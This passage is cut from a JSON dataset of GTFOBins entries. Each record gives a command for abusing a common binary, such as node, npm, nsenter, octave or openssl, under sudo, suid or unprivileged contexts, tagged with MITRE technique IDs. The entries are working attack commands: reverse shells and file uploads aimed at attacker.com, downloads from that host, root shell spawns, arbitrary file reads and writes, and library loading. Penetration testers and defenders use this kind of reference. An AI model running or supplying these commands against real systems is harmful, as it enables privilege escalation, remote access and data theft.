res.pipe(require(\"fs\").createWriteStream(\"/path/to/output-file\")))'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-read:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"node -e 'process.stdout.write(require(\"fs\").readFileSync(\"/path/to/input-file\"))'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:sudo","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:suid","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:file-write:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"node -e 'require(\"fs\").writeFileSync(\"/path/to/output-file\", \"DATA\")'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"]);\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:reverse-shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell"],"nativeCategory":["reverse-shell"],"command":"node -e 'sh = require(\"child_process\").spawn(\"/bin/sh\");\nrequire(\"net\").connect(12345, \"attacker.com\", function () {\n this.pipe(sh.stdin);\n sh.stdout.pipe(this);\n sh.stderr.pipe(this);\n})'","mitre":["T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:capabilities","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'process.setuid(0); require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"capabilities","context":"capabilities","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:sudo","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:suid","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", [\"-p\"], {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:shell:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"node -e 'require(\"child_process\").spawn(\"/bin/sh\", {stdio: [0, 1, 2]})'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:sudo","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:suid","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:node:upload:0:unprivileged","toolId":"gtfo:node","toolName":"node","name":"upload","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"node -e 'require(\"fs\").createReadStream(\"/path/to/input-file\").pipe(require(\"http\").request(\"http://attacker.com/path/to/output-file\"))'","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/node/"]},{"id":"gtfo:nohup:command:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:command:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:command:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"command","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["command"],"command":"nohup /path/to/command\ncat nohup.out","description":"The `nohup.out` file contains the standard output and error of the command.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:sudo","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:suid","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nohup /bin/sh -p -c '/bin/sh -p </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:nohup:shell:0:unprivileged","toolId":"gtfo:nohup","toolName":"nohup","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nohup /bin/sh -c '/bin/sh </dev/tty >/dev/tty 2>/dev/tty'","description":"This creates a `nohup.out` file in the current working directory.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nohup/"]},{"id":"gtfo:npm:shell:0:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:0:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"npm exec /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:1:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:1:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"preinstall\": \"/bin/sh\"}}' >package.json\nnpm -C . i","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:2:sudo","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:npm:shell:2:unprivileged","toolId":"gtfo:npm","toolName":"npm","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '{\"scripts\": {\"xxx\": \"/bin/sh\"}}' >package.json\nnpm -C . run xxx","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/npm/"]},{"id":"gtfo:nroff:file-read:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:file-read:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"nroff /path/to/input-file","description":"The file is typeset and some warning messages may appear.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:shell:0:sudo","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nroff:shell:0:unprivileged","toolId":"gtfo:nroff","toolName":"nroff","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >groff\nchmod +x groff\nGROFF_BIN_PATH=. nroff","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nroff/"]},{"id":"gtfo:nsenter:shell:0:sudo","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:nsenter:shell:0:suid","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"nsenter /bin/sh -p","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:nsenter:shell:0:unprivileged","toolId":"gtfo:nsenter","toolName":"nsenter","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"nsenter /bin/sh","description":"The shell command can be omitted.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/nsenter/"]},{"id":"gtfo:ntpdate:file-read:0:sudo","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:ntpdate:file-read:0:suid","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:ntpdate:file-read:0:unprivileged","toolId":"gtfo:ntpdate","toolName":"ntpdate","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ntpdate -a x -k /path/to/input-file -d localhost","description":"The file is actually parsed and lines are leaked through error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ntpdate/"]},{"id":"gtfo:octave:file-read:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-read:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-read:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"octave-cli --eval 'format none; fid = fopen(\"/path/to/input-file\"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:file-write:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"octave-cli --eval 'fid = fopen(\"/path/to/output-file\", \"w\"); fputs(fid, \"DATA\"); fclose(fid);'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:sudo","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:suid","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:octave:shell:0:unprivileged","toolId":"gtfo:octave","toolName":"octave","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"octave-cli --eval 'system(\"/bin/sh\")'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/octave/"]},{"id":"gtfo:od:file-read:0:sudo","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:od:file-read:0:suid","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:od:file-read:0:unprivileged","toolId":"gtfo:od","toolName":"od","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"od -An -c -w999 /path/to/input-file","description":"Three spaces are added before each character in the read file (wrapped at the specified value, i.e., `999`), and non-printable chars are printed as backslash escape sequences.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/od/"]},{"id":"gtfo:opencode:command:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:command:0:suid","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:command:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"opencode\n! /path/to/command","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:inherit:0:sudo","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:opencode:inherit:0:unprivileged","toolId":"gtfo:opencode","toolName":"opencode","name":"inherit ← sqlite3","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:sqlite3"],"command":"opencode db '...'","description":"This allows to run SQLite queries (`...`) provided that `sqlite3` is installed.","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/opencode/"]},{"id":"gtfo:openssl:download:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:download:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:download:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-read:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"openssl enc -in /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | openssl enc -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:file-write:1:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"openssl enc -in /path/to/input-file -out /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:library-load:0:unprivileged","toolId":"gtfo:openssl","toolName":"openssl","name":"library-load","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"openssl req -engine ./lib.so","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:sudo","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket","description":"The shell process is not spawn by `openssl`.","mitre":["T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/openssl/"]},{"id":"gtfo:openssl:reverse-shell:0:suid","toolId":"gtfo:openssl","toolName":"openssl","name":"reverse-shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Reverse/Bind Shell","Privilege Escalation"],"nativeCategory":["reverse-shell"],"command":"mkfifo /path/to/temp-socket\n/bin/sh -i </path/to/temp-socket 